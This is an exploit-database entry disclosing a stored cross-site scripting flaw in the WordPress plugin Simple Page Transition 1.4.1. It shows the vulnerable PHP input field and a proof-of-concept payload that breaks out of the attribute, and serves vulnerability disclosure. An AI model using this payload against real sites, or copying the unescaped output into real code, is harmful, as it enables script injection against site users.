Exploit for WordPress Simple Page Transition 1.4.1 Cross Site Scripting

Name: Exploit for WordPress Simple Page Transition 1.4.1 Cross Site Scripting
Rating: 5 (276 reviews)

2022-06-27 | CVSS -0.5

## https://sploitus.com/exploit?id=PACKETSTORM:167597
# Exploit Title: WordPress Plugin ‘Simple Page Transition’ - Stored Cross  
Site Scripting  
# Date: 27-06-2022  
# Exploit Author: Mariam Tariq - HunterSherlock  
# Vendor Homepage: https://wordpress.org/plugins/simple-page-transition/  
# Version: 1.4.1  
# Tested on: Firefox  
# Contact me: mariamtariq404@gmail.com  
  
  
*#Vulnerable code*:  
  
```  
<label for="simple_page_transition_ignored"><?php _e( 'Ignored Download  
Links', 'spt' ); ?></label><br />  
<input type="text" id="simple_page_transition_ignored"  
name="simple_page_transition_ignored" value="*<?php print  
$simple_page_transition_ignored; ?>*" /><br />  
  
```  
*#POC:*  
  
1- Install the plugin ‘simple page transition’ & activate it.  
2- Navigate towards the “ignored download links”  
3- Enter the XSS payload ` *“><img src=x onerror=alert(1)>*`  
  
*#POC image:*  
  
https://imgur.com/yzaTkhi